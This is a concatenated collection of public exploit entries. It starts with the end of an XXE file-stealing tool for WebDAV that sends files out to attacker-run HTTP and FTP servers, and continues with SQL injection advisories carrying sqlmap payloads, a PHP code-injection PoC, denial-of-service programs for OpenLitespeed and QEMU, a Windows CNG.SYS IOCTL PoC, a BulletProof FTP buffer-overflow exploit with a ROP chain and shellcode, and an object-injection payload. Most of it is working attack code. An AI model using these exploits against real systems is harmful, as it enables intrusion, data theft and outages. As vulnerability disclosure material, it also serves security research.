s.recv(1024) if not data: inputs.remove(s) continue if "USER" in data: s.send("331 password please - version check\n") else: s.send("230 more data please!\n") if not len([x for x in ["PASS","EPSV","EPRT","TYPE"] if x in data]): d['loot'] += data self.d = Manager().dict() self.d['loot'] = '' ftpd = ftp_handler(self.port) self.proc = Process(target = ftpd.serve, args=(self.d,)) self.proc.start() def stop(self): self.proc.terminate() def clean_buf(self): self.d['loot'] = '' def get_loot(self): loot = self.d['loot'] # clean data loot = loot.replace('\r\nRETR ','/') loot = loot.replace('\r\nCWD ','/') loot = loot.replace('CWD ','',1) loot = loot.replace('RETR ','',1) return loot def exploit(url, technique, creds = 'anonymous:anonymous'): global buffer_with_loot, rand_attr requests = { 'inb1' : { 'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY loot SYSTEM "%(file)s"> ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&loot;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>', 'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>' }, 'inb2' : { 'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY %% start "<![CDATA["> <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% end "]]>"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/inb2"> %%dtd; ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&all;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>', 'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>' }, 'oob' : { 'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE propfind [ <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/oob"> %%dtd; %%send; ]> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>' } } def request(url, verb, data, creds, timeout): req = Request(url, data) req.add_header('User-Agent', 
script_name) req.add_header('Content-Type', 'application/xml') req.add_header('Authorization', 'Basic ' + base64.b64encode(creds)) req.get_method = lambda: verb #req.set_proxy('127.0.0.1:8081','http') ### For debug resp = None try: resp = urlopen(req, timeout = timeout).read() except Exception, e: pass return resp while 1: cmdline = raw_input('\033[33menter command> \033[0m') cmdline = re.sub('\s+', ' ', cmdline) cmd = cmdline.split(' ')[0] arg = cmdline.split(' ')[-1] if cmd not in ['help', 'get', 'show', 'store', 'exit']: print '\n\033[36mno such command, use help for command list \033[0m\n' continue if cmd == 'exit': break if cmd == 'help': print '\033[36m' + help_interpreter + '\033[0m' continue if cmd == 'show': print '\n\033[36m' + buffer_with_loot + '\033[0m' continue if cmd == 'store': with open(arg,'w') as outf: outf.write(buffer_with_loot) print '\n\033[32mbuffer content has been stored in file ' + arg + '\033[0m\n' continue if cmd == 'get': if arg.startswith('.'): arg = '/proc/self/cwd' + arg[1:] arg = 'file://' + arg rand_attr = ''.join([random.choice(string.ascii_lowercase) for i in range(10)]) ### random attribute name where we place content if technique == 'inb1': request1 = requests['inb1']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg} request(url, 'PROPPATCH', request1, creds, timeout = 30) request2 = requests['inb1']['PROPFIND'] loot = request(url, 'PROPFIND', request2, creds, timeout = 30) try: buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text except: buffer_with_loot = '' if technique == 'inb2': request1 = requests['inb2']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg, 'ip' : ip, 'port' : hport} request(url, 'PROPPATCH', request1, creds, timeout = 30) request2 = requests['inb2']['PROPFIND'] loot = request(url, 'PROPFIND', request2, creds, timeout = 30) try: buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text.replace('<[CDATA[','').replace(']]>','') except: buffer_with_loot = '' if 
technique == 'oob': request1 = requests['oob']['PROPFIND'] % {'file' : arg, 'ip' : ip, 'port' : hport} request(url, 'PROPFIND', request1, creds, timeout = 8) buffer_with_loot = ftp_server.get_loot() ftp_server.clean_buf() len_ = sys.getsizeof(buffer_with_loot) - sys.getsizeof('') print "\n\033[32mloaded %s bytes in buffer\033[0m\n" % len_ if not len_: print '\033[36m' + failure_descr + '\033[0m' continue def parse_options(): global url, tech, ip, creds, hport, fport parser = OptionParser(usage = usage) parser.add_option('--url', dest = url, help = 'url parameter') parser.add_option('--tech', dest = tech, help = 'technique, valid values are: inb1, inb2, oob') parser.add_option('--creds', dest = creds, help = 'user credentials, default value is anonymous:anonymous') parser.add_option('--ip', dest = ip, help = 'ip address of netw interface that your target is able to access') parser.add_option('--hport', dest = hport, help = 'port for HTTP server which will be launched during attack, default is 9998') parser.add_option('--fport', dest = fport, help = 'port for FTP server which will be launched during attack, default is 9999') (options, args) = parser.parse_args() if not options.url or not options.tech: print 'you must specify url and tech parameters' sys.exit(2) if options.tech not in ['inb1', 'inb2', 'oob']: print 'invalid tech parameter' sys.exit(2) if options.tech != 'inb1' and not options.ip: print 'you must specify ip parameter' sys.exit(2) url = options.url tech = options.tech ip = options.ip creds = options.creds if options.creds else 'anonymous:anonymous' hport = options.hport if options.hport else 9998 fport = options.fport if options.fport else 9999 parse_options() if tech != 'inb1': http_server = HTTP_XXE(ip, hport, fport) http_server.run() if tech == 'oob': ftp_server = FTP_XXE(fport) ftp_server.run() exploit(url, tech, creds) if tech != 'inb1': http_server.stop() if tech == 'oob': ftp_server.stop()
-
WordPress Plugin GigPress 2.3.8 - SQL Injection
# Title: SQLi vulnerabilities in WordPress plugin "GigPress" # Author: Adrián M. F. - adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/gigpress/ # Active installs: 20,000+ # Vulnerable version: 2.3.8 # Fixed version: 2.3.9 # CVE: CVE-2015-4066 Vulnerabilities (2) ===================== (1) Authenticated SQLi [CWE-89] ------------------------------- * CODE: admin/handlers.php:87 +++++++++++++++++++++++++++++++++++++++++ $show['show_tour_id'] = $_POST['show_tour_id']; +++++++++++++++++++++++++++++++++++++++++ admin/handlers.php:94 +++++++++++++++++++++++++++++++++++++++++ $artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . ""); +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php POST DATA: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql [............] POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] sqlmap identified the following injection points with a total of 72 HTTP(s) requests: --- Parameter: show_artist_id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new --- [12:21:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0 +++++++++++++++++++++++++++++++++++++++++ (2) Authenticated SQLi [CWE-89] ------------------------------- * CODE: admin/handlers.php:71 +++++++++++++++++++++++++++++++++++++++++ $show['show_venue_id'] = $_POST['show_venue_id']; +++++++++++++++++++++++++++++++++++++++++ admin/handlers.php:95 +++++++++++++++++++++++++++++++++++++++++ $venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . 
"", ARRAY_A); +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php POST DATA: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql [............] POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 72 HTTP(s) requests: --- Parameter: show_venue_id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new --- [12:23:57] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0 
+++++++++++++++++++++++++++++++++++++++++ Timeline ======== 2015-05-09: Discovered vulnerability. 2015-05-20: Vendor notification. 2015-05-20: Vendor response and fix. 2015-05-25: Public disclosure.
-
WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution
# Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution # Date: 21-04-2015 # Exploit Author: woodspeed # Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/ # Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip # Version: 1.1 # Tested on: Apache 2.2.22, PHP 5.3.10 # OSVDB ID : http://www.osvdb.org/show/osvdb/121081 # WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935 # Category: webapps 1. Description Remote Code Execution via email field. 2. Proof of Concept POST Request sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit= When the admin user checks the subscribers list, the php code is executed. 3. Solution Fixed in version 1.2
-
OpenLitespeed 1.3.9 - Use-After-Free (Denial of Service)
/*
 * Openlitespeed 1.3.9 Use After Free denial of service exploit.
 *
 * This exploit triggers a denial of service condition within the Openlitespeed web
 * server. This is achieved by sending a tampered request contain a large number (91)
 * of 'a: a' header rows. By looping this request, a memmove call within the HttpReq
 * class is triggered with a freed pointer, resulting in a reference to an invalid
 * memory location and thus a segmentation fault.
 *
 * UAF Request:
 * GET / HTTP/1.0
 * a: a
 *   (the 'a: a' header line is repeated 91 times in the original listing;
 *    the count is the author's)
 *
 * The above request should be placed into a file name 'uafcrash' prior to running this
 * exploit code.
 *
 * Date: 24/03/2015
 * Author: Denis Andzakovic - Security-Assessment.com
 *
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>

/* NOTE(review): <errno.h> already provides errno (on glibc it is a macro),
 * so this explicit declaration is redundant at best. */
extern int errno;

/*
 * Entry point: reads the request from the file 'uafcrash' and, in an endless
 * loop, opens a TCP connection to the hard-coded host:port, writes the file
 * line by line, closes the socket and rewinds the file.  The loop ends only
 * when connect() fails (the author's signal that the server went down), so
 * the trailing 'return 42' is never reached.
 *
 * Returns 1 when fopen(), socket() or connect() fails.  argc/argv are unused.
 * The FILE and the getline() buffer are never released explicitly; every
 * exit path returns from main, so the OS reclaims them.
 */
int main(int argc, char ** argv){
    FILE * fp;
    size_t len = 0;
    /* NOTE(review): 'line' is left uninitialised.  getline(3) treats a
     * non-NULL *lineptr as a malloc()'d buffer it may realloc(), so the first
     * call below is undefined behaviour unless this is set to NULL. */
    char * line;
    if((fp = fopen("uafcrash", "r")) == NULL){
        fprintf(stderr, "[!] Error: Could not open file uafcrash: %s", strerror(errno));
        return 1;
    }
    char * host = "127.0.0.1";  /* target address and port, hard-coded */
    int port = 8088;
    int count = 0;              /* connections completed so far */
    int sock;
    struct sockaddr_in serv_addr;
    while(1){
        if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
            fprintf(stderr, "[!] Error: Could not create socket \n");
            return 1;
        }
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_port = htons(port);
        /* inet_pton() result is not checked; 'host' is a literal here. */
        inet_pton(AF_INET, host, &serv_addr.sin_addr);
        if(connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0){
            fprintf(stderr, "[!] Error: Could not connect! Check for server crash! Total cases sent:%d\n", count);
            close(sock);
            return 1;
        }
        /* One write() per line of the request file; short writes and
         * write() errors are not checked. */
        while ((getline(&line, &len, fp)) != -1){
            write(sock, line, strlen(line));
        }
        close(sock);
        rewind(fp);
        count++;
    }
    /* unreachable: the loop above only exits via return */
    return 42;
}
-
Chronosite 5.12 - SQL Injection
# Exploit Title: Chronosite 5.12 SQL Injection # Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site" # Date: 13/05/15 # Exploit Author: Wad Deek # Vendor Homepage: http://www.chronosite.org/ # Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip # Version: 5.12 # Tested on: Xampp on Windows7 ################################################################ PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27 ################################################################
-
QEMU - Floppy Disk Controller (FDC) (PoC)
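// Source: https://marc.info/?l=oss-security&m=143155206320935&w=2
#include <stdio.h>
#include <sys/io.h>

/* I/O port this PoC writes to (the FDC data FIFO, going by the macro name). */
#define FIFO 0x3f5

/*
 * Writes one 0x0a byte (READ ID, per the original comment) to the FIFO port,
 * then pushes ten million 0x42 bytes at it.  Direct port access needs
 * I/O privilege level 3, which iopl(3) grants only to a privileged process.
 *
 * Returns 0 when the writes complete, 1 if iopl() fails.
 */
int main(void)
{
    /* The original ignored the iopl() result; when it fails (EPERM for an
     * unprivileged caller) the first outb() faults instead of reporting it. */
    if (iopl(3) != 0) {
        perror("iopl");
        return 1;
    }
    outb(0x0a, FIFO); /* READ ID */
    for (int i = 0; i < 10000000; i++)
        outb(0x42, FIFO); /* push */
    return 0;
}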
-
Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (MS15-052)
// Source: http://www.binvul.com/viewthread.php?tid=508
// Source: https://twitter.com/NTarakanov/status/598370525132423168
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")

/*
 * Entry point: opens the \Device\CNG device object through NtOpenFile
 * (resolved at run time from ntdll.dll), sends it IOCTL 0x390048 with a
 * 4-byte in/out buffer, prints the DWORD that comes back and waits for a
 * key press so the console stays open.
 *
 * Returns 0 normally, -1 if the device cannot be opened; calls exit(-1) if
 * NtOpenFile cannot be resolved.  argc/argv are unused.
 */
int main(int argc, CHAR* argv[])
{
    // Prototype of ntdll!NtOpenFile, looked up dynamically below.
    typedef NTSTATUS (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle,
                                               IN ACCESS_MASK DesiredAccess,
                                               IN POBJECT_ATTRIBUTES ObjectAttributes,
                                               OUT PIO_STATUS_BLOCK IoStatusBlock,
                                               IN ULONG ShareAccess,
                                               IN ULONG OpenOptions);
    NT_OPEN_FILE NtOpenFileStruct;
    PVOID Info;  // unused
    // NOTE(review): the LoadLibrary result is passed to GetProcAddress
    // without a NULL check, and the module handle is never released with
    // FreeLibrary.
    HMODULE hModule = LoadLibrary(("ntdll.dll"));
    NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile");
    if(NtOpenFileStruct == NULL)
    {
        // NOTE(review): exit() is declared in <stdlib.h>, which is not
        // included directly here.
        exit(-1);
    }
    UNICODE_STRING filename;
    RtlInitUnicodeString(&filename, L"\\Device\\CNG");
    OBJECT_ATTRIBUTES obja;
    obja.Attributes = 0x40;  // 0x40 is OBJ_CASE_INSENSITIVE
    obja.ObjectName = &filename;
    // NOTE(review): structure size hard-coded instead of taken from
    // sizeof(OBJECT_ATTRIBUTES) / InitializeObjectAttributes(), so the value
    // is tied to one build target.
    obja.Length = 0x18;
    obja.RootDirectory = NULL;
    obja.SecurityDescriptor = NULL;
    obja.SecurityQualityOfService = NULL;
    IO_STATUS_BLOCK iostatusblock;
    HANDLE hCNG = NULL;
    // DesiredAccess 0x100001, ShareAccess 7 and OpenOptions 0x20 are raw
    // values; presumably SYNCHRONIZE | 0x1, share read/write/delete and
    // FILE_SYNCHRONOUS_IO_NONALERT -- confirm against the SDK headers.
    NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20);
    if(NT_SUCCESS(stat))
    {
        printf("File successfully opened.\n");
    }
    else
    {
        printf("File could not be opened.\n");
        return -1;
    }
    DWORD dwBuffer = 0;  // 4-byte buffer used as both input and output
    DWORD dwCnt = 0;     // bytes returned by the driver
    // The (HANDLE) cast is redundant: hCNG already is a HANDLE.
    BOOL bRet = DeviceIoControl((HANDLE)hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL);
    if (FALSE == bRet)
    {
        printf("[*]Send IOCTL fail!\n");
        // GetLastError() returns a DWORD; %d prints it as signed.
        printf("[*]Error Code:%d\n", GetLastError());
    }
    else
    {
        printf("[*]0x%08x\n", dwBuffer);
    }
    CloseHandle(hCNG);
    getchar();  // keep the console window open until a key is pressed
    return 0;
}
-
BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)
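#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)           #
# Date: Feb 15 2015                                                           #
# Exploit Author: Gabor Seljan                                                #
# Software Link: http://www.bpftp.com/                                        #
# Version: 2010.75.0.76                                                       #
# Tested on: Windows XP SP3 English                                           #
# Credits: His0k4                                                             #
# CVE: CVE-2008-5753                                                          #
#-----------------------------------------------------------------------------#

#!/usr/bin/python

# Builds a BulletProof FTP session file (.bps) and writes it to 'sploit.bps'
# in the current directory.  The file is a CRLF-joined list of fields; the
# host field carries 'buf', the name field carries the ROP chain, egghunter
# and stack-copy stub, and the local-directory field carries the egg-tagged
# shellcode.  Every other field is a fixed literal.

from struct import pack

# offset to SEH is 93 byte
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L',0x77c4dca8) # ADD ESP,2C # RETN [msvcrt.dll]
buf += b'A' * 18
buf += pack('<L',0x77c1c47f) # POP EBX # POP EBP # RETN 10 [msvcrt.dll]
buf += b'A' * 8
buf += pack('<L',0x74c86a9a) # RETN [oleacc.dll]
buf += b'A' * 10
buf += b'\xce\xc3\x40' # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe]

# ROP chain
rop_gadgets = b''
rop_gadgets += pack('<L',0x77c364d5) # POP EBP # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c364d5) # skip 4 bytes [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xfffffafe) # Value to negate, will become 0x00000501
rop_gadgets += pack('<L',0x7ca82222) # NEG EAX # RETN [shell32.dll]
rop_gadgets += pack('<L',0x77227494) # XCHG EAX,EBX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop_gadgets += pack('<L',0x771bcbe4) # NEG EAX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77f124c8) # XCHG EAX,EDX # RETN [GDI32.dll]
rop_gadgets += pack('<L',0x77c2c343) # POP ECX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c605b5) # &Writable location [msvcrt.dll]
rop_gadgets += pack('<L',0x77c23b47) # POP EDI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c39f92) # RETN (ROP NOP) [msvcrt.dll]
rop_gadgets += pack('<L',0x77c34d9a) # POP ESI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c2aacc) # JMP [EAX] [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c11120) # ptr to &VirtualProtect() [IAT msvcrt.dll]
rop_gadgets += pack('<L',0x77c12df9) # PUSHAD # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c35524) # ptr to 'push esp # ret ' [msvcrt.dll]

# heap-only egghunter
hunter = b'\x6a\x30\x5a' # PUSH 30 # POP EDX
hunter += b'\x64\x8b\x12' # MOV EDX, DWORD PTR FS:[EDX]
hunter += b'\x80\xc2\x90' # ADD DL,90
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\xeb\x05' # JMP SHORT
hunter += b'\x66\x81\xca\xff\x0f' # OR DX,0FFF
hunter += b'\x42\x52' # INC EDX # PUSH EDX
hunter += b'\x6a\x02\x58' # PUSH 2 # POP EAX
hunter += b'\xcd\x2e' # INT 2E
hunter += b'\x3c\x05' # CMP AL,5
hunter += b'\x5a' # POP EDX
hunter += b'\x74\xef' # JE SHORT
hunter += b'\xb8\x77\x30\x30\x74' # MOV EAX, w00t
hunter += b'\x89\xd7' # MOV EDI,EDX
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xea' # JNZ SHORT
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xe7' # JNZ SHORT

# copy shellcode back to stack
strcpy = b'\x8b\xec' # MOV EBP,ESP
strcpy += b'\x57\x55\x55' # PUSH EDI # PUSH EBP # PUSH EBP
strcpy += b'\x68\x30\x60\xc4\x77' # PUSH ptr to &strcpy [msvcrt.dll]
strcpy += b'\xc3' # RET

egg = 'w00t'.encode()

# msfvenom -p windows/exec -b '\x00\x0d\x0a\x1a' -e x86/shikata_ga_nai cmd=calc.exe
shellcode = b''
shellcode += b'\xdb\xd1\xb8\xda\x92\x2c\xca\xd9\x74\x24\xf4\x5a\x31'
shellcode += b'\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xce\x70'
shellcode += b'\xd9\x36\x06\xf6\x22\xc7\xd6\x97\xab\x22\xe7\x97\xc8'
shellcode += b'\x27\x57\x28\x9a\x6a\x5b\xc3\xce\x9e\xe8\xa1\xc6\x91'
shellcode += b'\x59\x0f\x31\x9f\x5a\x3c\x01\xbe\xd8\x3f\x56\x60\xe1'
shellcode += b'\x8f\xab\x61\x26\xed\x46\x33\xff\x79\xf4\xa4\x74\x37'
shellcode += b'\xc5\x4f\xc6\xd9\x4d\xb3\x9e\xd8\x7c\x62\x95\x82\x5e'
shellcode += b'\x84\x7a\xbf\xd6\x9e\x9f\xfa\xa1\x15\x6b\x70\x30\xfc'
shellcode += b'\xa2\x79\x9f\xc1\x0b\x88\xe1\x06\xab\x73\x94\x7e\xc8'
shellcode += b'\x0e\xaf\x44\xb3\xd4\x3a\x5f\x13\x9e\x9d\xbb\xa2\x73'
shellcode += b'\x7b\x4f\xa8\x38\x0f\x17\xac\xbf\xdc\x23\xc8\x34\xe3'
shellcode += b'\xe3\x59\x0e\xc0\x27\x02\xd4\x69\x71\xee\xbb\x96\x61'
shellcode += b'\x51\x63\x33\xe9\x7f\x70\x4e\xb0\x15\x87\xdc\xce\x5b'
shellcode += b'\x87\xde\xd0\xcb\xe0\xef\x5b\x84\x77\xf0\x89\xe1\x88'
shellcode += b'\xba\x90\x43\x01\x63\x41\xd6\x4c\x94\xbf\x14\x69\x17'
shellcode += b'\x4a\xe4\x8e\x07\x3f\xe1\xcb\x8f\xd3\x9b\x44\x7a\xd4'
shellcode += b'\x08\x64\xaf\xb7\xcf\xf6\x33\x16\x6a\x7f\xd1\x66'

# Session-file fields, in the order the client reads them.
identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.'
host = buf
port = b'21'
name = b'B' + rop_gadgets + hunter + strcpy
password = b'bpfmcidchffddknejf'
local = egg + egg + shellcode

sploit = b"\r\n".join([identifier, host, port, name, password, local])

try:
    print('[*] Creating exploit file...')
    # 'with' closes the file on every path; the original left it open if
    # write() raised.
    with open('sploit.bps', 'wb') as f:
        f.write(sploit)
    print('[*] sploit.bps file successfully created!')
except (OSError, IOError) as exc:
    # Catch only file errors (IOError for Python 2) and report the cause
    # instead of swallowing every exception silently.
    print('[!] Error while creating exploit file!')
    print('[!] Reason: %s' % exc)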
-
Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities
Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities [+] Author: Filippo Roncari [+] Target: Forma LMS [+] Version: 1.3 and probably lower [+] Vendor: http://www.formalms.org [+] Accessibility: Remote [+] Severity: High [+] CVE: <requested> [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf [+] Info: f.roncari@securenetwork.it / f@unsec.it [+] Summary Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more. [+] Vulnerability Details Forma LMS 1.3 is prone to multiple PHP Object Injection vulnerabilities, due to a repeated unsafe use of the unserialize() function, which allows unprivileged users to inject arbitrary PHP objects. A potential attacker could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input, in order to execute code on the remote server or abuse arbitrary functionalities. [+] Technical Details See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for the list of identified OI flaws and further technical details. [+] Proof of Concept (PoC) The following PoC shows how to abuse the unsafe unserialize() called in writemessage() function in order to trigger a SQL injection flaw. This is an alternative way to exploit one of the identified OI, since a quick check did not highlight useful magic methods. The PoC as well as the other identified vulnerabilities are further detailed in the full advisory. [!] PoC Payload ---------------------------- a:2:{i:0;s:122:"0) union select if(substring(pass,1,1) = char(53),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836-- ";i:1;s:1:"1";} ---------------------------- [!] 
PoC Request ---------------------------- POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1 Host: localhost Cookie: docebo_session=91853e7eca413578de70304f94a43fe1 Content-Type: multipart/form-data; boundary=---------------------------1657367614367103261183989796 Content-Length: 1453 [...] -----------------------------1657367614367103261183989796 Content-Disposition: form-data; name="message[recipients]" a%3A2%3A%7Bi%3A0%3Bs%3A122%3A%220%29+union+SELECT+IF%28SUBSTRING%28pass%2C1%2C1%29+%3D+ char%2853%29%2Cbenchmark%285000000%2Cencode%281%2C2%29%29%2Cnull%29+from+core_user+where+idst% 3D11836--++%22%3Bi%3A1%3Bs%3A1%3A%221%22%3B%7D [...] -------------------------- [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
-
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
# Source: https://github.com/pandujar/elasticpwn/
#
# Python 2 script (print statement, '<>' operator, 'except Exception, e').
# Usage: <script> <host> <path>.  Probes a fixed list of plugin names on
# port 9200 and, for the first one that answers 200, requests <path> through
# that plugin's route and prints the raw HTTP response.

